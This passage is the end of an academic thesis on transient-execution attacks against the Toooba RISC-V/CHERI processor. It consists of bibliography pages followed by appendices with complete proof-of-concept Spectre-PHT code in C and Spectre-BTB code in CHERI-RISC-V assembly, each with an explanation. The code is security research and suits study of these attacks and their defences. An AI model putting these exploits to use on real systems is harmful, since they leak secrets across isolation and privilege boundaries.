Page 84: Analysis of Transient-Execution Attacks on the out-of

BIBLIOGRAPHY 71

[37] Robert N. M. Watson et al. Capability Hardware Enhanced RISC In-

structions: CHERI Instruction-Set Architecture (Version 8). Tech. rep.

UCAM-CL-TR-951. University of Cambridge, Computer Laboratory,

Oct. 2020. url: https://www.cl.cam.ac.uk/techreports/

UCAM-CL-TR-951.pdf.

[38] Jonathan Woodruff et al. “CHERI Concentrate: Practical Compressed

Capabilities”. In: IEEE Transactions on Computers 68.10 (2019), pp. 1455–

1469.

[39] Brooks Davis et al. CheriABI: Enforcing valid pointer provenance and

minimizing pointer privilege in the POSIX C run-time environment.

Tech. rep. UCAM-CL-TR-932. University of Cambridge, Computer Lab-

oratory, Apr. 2019. url: https://www.cl.cam.ac.uk/techreports/

UCAM-CL-TR-932.pdf.

[40] Hongyan Xia et al. “CheriRTOS: A Capability Model for Embedded

Devices”. In: 2018 IEEE 36th International Conference on Computer

Design (ICCD). Orlando, FL, USA: IEEE Computer Society, Oct. 2018,

pp. 92–99.

[41] David Kaplan, Jeremy Powell, and Tom Woller. AMD SEV-SNP: Strength-

ening VM Isolationwith Integrity Protection and More. Tech. rep. Ad-

vanced Micro Devices Inc., Jan. 2020. url: https://www.amd.

com/system/files/TechDocs/SEV-SNP-strengthening-

vm-isolation-with-integrity-protection-and-more.

pdf.

[42] Abraham Gonzalez et al. “Replicating and Mitigating Spectre Attacks

on a Open Source RISC-V Microarchitecture”. In: Third Workshop on

Computer Architecture Research with RISC-V. Phoenix, AZ, USA, June

2019.

[43] Christopher Celio, David A. Patterson, and Krste Asanović. The Berke-

ley Out-of-Order Machine (BOOM): An Industry-Competitive, Synthe-

sizable, Parameterized RISC-V Processor. Tech. rep. UCB/EECS-2015-

167. University of California at Berkeley, Electrical Engineering and

Computer Sciences, June 2015.

[44] Anh-Tien Le et al. “Experiment on Replication of Side Channel Attack

via Cache of RISC-V Berkeley Out-of-Order Machine (BOOM) Im-

plemented on FPGA”. In: Fourth Workshop on Computer Architecture

Research with RISC-V (CARRV 2020). Valencia, Spain, May 2020.

Page 85: Analysis of Transient-Execution Attacks on the out-of

72 BIBLIOGRAPHY

[45] Arm Limited. Vulnerability of Speculative Processors to Cache Tim-

ing Side-Channel Mechanism. https://developer.arm.com/

support/arm-security-updates/speculative-processor-

vulnerability. 2020.

[46] Sizhou Zhang et al. “Composable Building Blocks to Open up Proces-

sor Design”. In: 2018 51st Annual IEEE/ACM International Symposium

on Microarchitecture (MICRO). Fukouka, Japan, Oct. 2018, pp. 68–81.

[47] Zhen Hang Jiang and Yunsi Fei. “A novel cache bank timing attack”. In:

2017 IEEE/ACM International Conference on Computer-Aided Design

(ICCAD). Irvine, CA, USA, Nov. 2017, pp. 139–146.

[48] Hovav Shacham. “The Geometry of Innocent Flesh on the Bone: Return-

into-Libc without Function Calls (on the X86)”. In: Proceedings of

the 14th ACM Conference on Computer and Communications Security.

CCS ’07. Alexandria, Virginia, USA: Association for Computing Ma-

chinery, 2007, pp. 552–561.

[49] Arm Limited. Arm Architecture Reference Manual Supplement Morello

for A-profile Architecture. DDI0606. Arm Limited. Sept. 2020.

Page 86: Analysis of Transient-Execution Attacks on the out-of

Appendix A

Full C Attack

/*

* Author: Franz Fuchs

*

* Spectre-PHT proof of concept version

*

* spec_funct first checks the array bounds

* and then loads the value determined by the

* index. By training the Pattern History Table

* with 16 calls to the function with valid indexes,

* we trick Toooba in speculatively executing

* the loads even though the index is out of bounds.

*/

#ifdef __CHERI_PURE_CAPABILITY__

#include "pure_cap.h"

#endif

#define MEM_SIZE 16384

#define MEM_SIZE_DW MEM_SIZE/8

#define STACK_SIZE 2048

#define STACK_SIZE_DW STACK_SIZE/8

#define PROBE_SIZE 2048

#define PROBE_SIZE_DW PROBE_SIZE/8

#define SEC_ARR_SIZE 128

#define SEC_ARR_SIZE_DW SEC_ARR_SIZE/8

#define FLUSH_ARR_SIZE 16384

73

Page 87: Analysis of Transient-Execution Attacks on the out-of

74 APPENDIX A. FULL C ATTACK

#define FLUSH_ARR_SIZE_DW FLUSH_ARR_SIZE/8

long int mem[MEM_SIZE_DW];

long int buffer[FLUSH_ARR_SIZE_DW];

long int stack[STACK_SIZE_DW];

long int flush_arr[FLUSH_ARR_SIZE_DW];

// array with secrets that may not

// be overflowed

long int* sec_arr_1[SEC_ARR_SIZE_DW];

long int* sec_arr_2[SEC_ARR_SIZE_DW];

long int size = 16;

int main();

void fill_sec_arr();

void probe();

long int spec_funct(long int index);

void flush();

extern void _init_sp(void);

int main()

{

// write to stack in order to

// not out-optimize this

stack[0] = 0;

size = 16;

fill_sec_arr();

// train the pattern history table of the

// speculative function

flush_arr[0x0] = spec_funct(0x0);

flush_arr[0x1] = spec_funct(0x1);

flush_arr[0x2] = spec_funct(0x2);

flush_arr[0x3] = spec_funct(0x3);

flush_arr[0x4] = spec_funct(0x4);

flush_arr[0x5] = spec_funct(0x5);

Page 88: Analysis of Transient-Execution Attacks on the out-of

APPENDIX A. FULL C ATTACK 75

flush_arr[0x6] = spec_funct(0x6);

flush_arr[0x7] = spec_funct(0x7);

flush_arr[0x8] = spec_funct(0x8);

flush_arr[0x9] = spec_funct(0x9);

flush_arr[0xa] = spec_funct(0xa);

flush_arr[0xb] = spec_funct(0xb);

flush_arr[0xc] = spec_funct(0xc);

flush_arr[0xd] = spec_funct(0xd);

flush_arr[0xe] = spec_funct(0xe);

flush_arr[0xf] = spec_funct(0xf);

// flush cache to evict the line

// containing the `size` parameter

flush();

// store index at mem

// keep line cached

sec_arr_2[8] = & (mem[0x40]);

// ensure that all previous

// loads and stores are finished

asm volatile("fence rw, rw");

// call spec function with

// out of bounds argument

flush_arr[0x20] = spec_funct(24);

// probe the memory

probe();

}

void fill_sec_arr()

{

for(int i = 0; i < size; i++)

{

sec_arr_1[i] = &(mem[0]);

}

}

Page 89: Analysis of Transient-Execution Attacks on the out-of

76 APPENDIX A. FULL C ATTACK

void probe()

{

long int dest;

for(int i = 0; i < FLUSH_ARR_SIZE_DW; i = i + 8)

{

dest = mem[i];

mem[i] = dest + 1;

}

}

long int spec_funct(long int index)

{

long int dest = index;

if(index < size)

{

long int* mem_index = sec_arr_1[index];

dest = *mem_index;

}

return dest;

}

void flush()

{

long int dest;

for(int i = 0; i < FLUSH_ARR_SIZE_DW; i = i + 8)

{

dest = flush_arr[i];

flush_arr[i] = dest + 1;

}

}

In this appendix, I explain how I conducted a Spectre-PHT attack written in

C. However, I do not explain the specific Spectre-PHT vulnerability as I have

already done so in Chapters 4 and 5. I chose a similar setup to the original

Spectre-PHT demonstrated in [22]. Parts of the preparation code, e.g., initial-

ising registers, is not shown in the code above. The attack setup is as follows.

The function spec_funct accesses the array sec_arr_1 and returns the

value stored at the secret memory pointer if the parameter value index is less

Page 90: Analysis of Transient-Execution Attacks on the out-of

APPENDIX A. FULL C ATTACK 77

than size. I chose size to be 16 in this example. There exists another array

sec_arr_2, which holds secret memory pointers as well. It is the goal of the

attacker to reveal one or more secret memory addresses from sec_arr_2 in

this attack.

The arrays sec_arr_1 and sec_arr_2 are placed adjacently in mem-

ory by the compiler. The attacker wants to use a greater index than allowed in

order to read from sec_arr_2 instead of sec_arr_1. The code in main

fulfills three functions: it prepares the attack, conducts it, and eventually re-

veals the sought memory address by probing. In the preparation phase, I fill

the array sec_arr_1 with meaningful pointer values and call the function

spec_funct with values in the range [0, . . . ,0xf] for the index parame-

ter. Next, I need to flush the memory in order to evict the cache line, which

holds the value of the size variable. The flush function evicts cache lines by

loading other cache lines currently not being present.

Flushing introduces the necessary delay for the actual Spectre-PHT attack

later. After flushing, I also setup the array sec_arr_2 for the attack by stor-

ing a meaningful value. This brings the cache lines into the cache as well,

which makes the attacker faster. The last step before the attack is introduce a

memory fence, which avoids that the processor speculates too far. This would

cause uninitialised data to be used in speculation, which would lead to cache

misses and therefore would negatively impact the entire attack. In general,

the attacker wants to use every cycle of the misspeculated control-flow as ef-

fectively as possible and therefore attackers want to avoid unnecessary cache

misses. After that, the actual attack is conducted as described in Chapters 4

and 5. Last, I use the probing mechanism described in Section 3.3.2, which

reveals the sought value.

Page 91: Analysis of Transient-Execution Attacks on the out-of

Appendix B

Full CHERI-RISC-V Attack

.text

/*

Kernel-BTB

Author: Franz Fuchs

The goal of the attack is to speculatively jump from

S mode to U mode. This gives an attacker the full

register state of the code operating in S mode. In

this example, the user code leaks private to M mode.

This attack is similar to the sandbox attack.

1st load: 0x0000000080060000

2nd load: 0x0000000080061000

*/

change_to_cap_mode:

// set pcc flags such that capability encoding

// mode is used

// This is described in the CHERI Specification v7

cspecialr ct3, pcc

li t1, 1

csetflags ct3, ct3, t1

li t2, 0x80000018

csetoffset ct3, ct3, t2

78

Page 92: Analysis of Transient-Execution Attacks on the out-of

APPENDIX B. FULL CHERI-RISC-V ATTACK 79

cjr ct3

init_caps:

/*

* data capabilities

*/

// cs1 is a capability to [0x80001000 - 0x80001fff]

li t2, 0x80001000

cfromptr cs1, ddc, t2

li t1, 0x1000

csetbounds cs1, cs1, t1

// ct6 is a capability to [0x80002000 - 0x80002fff]

li t2, 0x80002000

cfromptr ct6, ddc, t2

li t1, 0x1000

csetbounds ct6, ct6, t1

// store value at 0(ct6)

li t1, 0x200

csd t1, 0(ct6)

/*

* code capabilities

*/

// PCC for flush function

cllc cs4, flush

li t1, 0x100

csetbounds cs4, cs4, t1

// PCC for user code jump

cllc cs5, user_funct_cont

li t1, 0x100

csetbounds cs5, cs5, t1

Page 93: Analysis of Transient-Execution Attacks on the out-of

80 APPENDIX B. FULL CHERI-RISC-V ATTACK

// PCC for kernel code jump

cllc ct1, kernel_funct_cont

li t2, 0x100

csetbounds ct1, ct1, t2

// store at 0(cs1)

csc ct1, 0(cs1)

init_exceps:

// enable interrupts for all privilege levels

// MIE = 1, SIE = 1, UIE = 1

li t2, 0xb

csrs mstatus, t2

// delegate ecalls to S mode

// ecalls are set with bit 8

li t2, 256

csrw medeleg, t2

// changes to S mode

change_to_s_mode:

// set MPP such that we return to S mode

li x6, 0x00001000

csrc mstatus, x6

li x6, 0x00000800

csrs mstatus, x6

// store perform_s_mode_action address in mepcc

cllc ct0, perform_s_mode_action

cspecialw mepcc, ct0

mret

// initialises trap vector

perform_s_mode_action:

// stvec mode: direct (value 0 as RISC-V instructions

// are aligned on 2 byte boundaries)

Page 94: Analysis of Transient-Execution Attacks on the out-of

APPENDIX B. FULL CHERI-RISC-V ATTACK 81

// stvec base address: kernel_funct

cllc ct2, kernel_funct

li t1, 0x10000

csetbounds ct2, ct2, t1

cspecialw stcc, ct2

change_to_u_mode:

// set SPP such that we return to U mode

li x6, 0x00000100

csrc sstatus, x6

// store user_funct address in mepcc

cllc ct0, user_funct

li t1, 0x10000

csetbounds ct0, ct0, t1

cspecialw sepcc, ct0

// jump to user code

sret

flush:

// flush entire cache

// use ddc for that

// set to memory address not used by

// other sections

li t2, 0x80010000

li t3, 0x4000

add t3, t2, t3

cfromptr ct1, ddc, t2

flush_loop:

cld t0, 0(ct1)

cincoffsetimm ct1, ct1, 64

cgetaddr t0, ct1

ble t0, t3, flush_loop

Page 95: Analysis of Transient-Execution Attacks on the out-of

82 APPENDIX B. FULL CHERI-RISC-V ATTACK

// fence instruction

fence rw, rw

cret

/*

* kernel code

*

* running in S priviledge mode

*/

.section .kernel , "ax"

kernel_funct:

// jump to start function

// done this way in order to always have the same

// start address, which gives makes it easier to

// alias the right BTB entry

j kernel_funct_start

.rept 0x40

.byte 0x00

.endr

kernel_funct_start:

// generate a powerful capability

li t2, 0x80060000

li t3, 0x10000

li t4, 0x1000

add t3, t2, t3

cfromptr ct6, ddc, t2

csd t4, 0(ct6)

// jump to kernel_funct_cont

clc ct1, 0(cs1)

// this jump will be aliased and MUST NOT be

// moved around. If moved around, the corresponding

// jump in the user code must be adjusted as well

cjr ct1

Page 96: Analysis of Transient-Execution Attacks on the out-of

APPENDIX B. FULL CHERI-RISC-V ATTACK 83

.rept 0x40

.byte 0x00

.endr

kernel_funct_cont:

// content of ct6 shall not be visible to anyone else

cmove ct6, cnull

// idle here

j kernel_funct_cont

/*

* user code

*

* running in U priviledge mode

*/

.section .user , "ax"

user_funct:

// done this way in order to always have the same

// start address, which gives makes it easier to

// alias the right BTB entry

j user_funct_start

.rept 0xc52

.byte 0x00

.endr

user_funct_start:

// flush caches

cjalr cra, cs4

// jump to continued code

// this jump will be used for aliasing and MUST NOT be

// moved around. If moved around, the corresponding

// jump in the kernel code must be adjusted as well

cjr cs5

Page 97: Analysis of Transient-Execution Attacks on the out-of

84 APPENDIX B. FULL CHERI-RISC-V ATTACK

.rept 0x40

.byte 0x00

.endr

user_funct_cont:

// load from ct6

// This is the transient-execution sequence

// revealing the secret value

cld t5, 0(ct6)

cincoffset ct5, ct6, t5

cld t5, 0(ct5)

// call kernel_funct

ecall

// infinite loop

user_funct_loop:

add t1, x0, x0

beq t1, x0, user_funct_loop

In this appendix, I explain how I conducted a Spectre-BTB attack written

in CHERI-RISC-V assembly. However, I do not explain the specific Spectre-

BTB vulnerability as I have already done so in Chapters 4 and 5. The code

is separated in preparation code, kernel code, and user code. The goal of the

attack is to leak a kernel-space secret from user space. I will only describe the

preparation code as the kernel and user space code depicted above shows large

similarities to the attack described in Section 5.1.3.

The task is to bring Toooba from integer pointer mode to capability pointer

mode, which is achieved in change_to_cap_mode by setting the corre-

sponding flag to a code capability and then jumping to it. The next step is to set

up capability registers with code and data capabilities used during the demon-

stration of the attack later. This is done in the code following the init_caps

label. The principle is always the same. First, the almighty capability stored in

ddc is moved to a register and the base address of the capability is specified.

As the second and last step, the bounds are set.

The largest part of the preparation code is to set up Toooba such that the

kernel code runs in S privilege mode and the user code runs in U privilege

mode. The kernel code will be called during exception handling, which re-

quires that I need to enable exceptions (done in init_exceps) and set up

exception vectors. A pointer to the function kernel_funct is stored in

Page 98: Analysis of Transient-Execution Attacks on the out-of

APPENDIX B. FULL CHERI-RISC-V ATTACK 85

stcc – the capability extended register for the exception vector base address

register in S privilege mode – setting up exception handling. Finally, the code

changes privilege mode to U mode and jumps to the function user_funct

– the beginning of the user code.

The two instructions in the function user_funct_start constitute the

last part of the preparation code. The first instruction is a call to the flush

function defined earlier in the code. This ensures that a load in the kernel

code will miss all caches and therefore enable the attack due to Toooba mis-

speculating for a longer time. The second instruction is a jump to the label

user_funct_cont. This jump instruction trains the BTB as described in

Chapter 5. The ecall instruction is an environment call, which is handled

by the kernel code. This effectively starts the attack. A probing function is

not shown in the attack example above. At multiple places in the code, I use

assembler macros that insert zero bytes or no-operations (nop). This is used in

order to align instructions in memory such that the BTB aliasing approaches

works. The .section statements have the same task, but on a coarser scale.

Page 99: Analysis of Transient-Execution Attacks on the out-of

TRITA-EECS-EX-2021:61

www.kth.se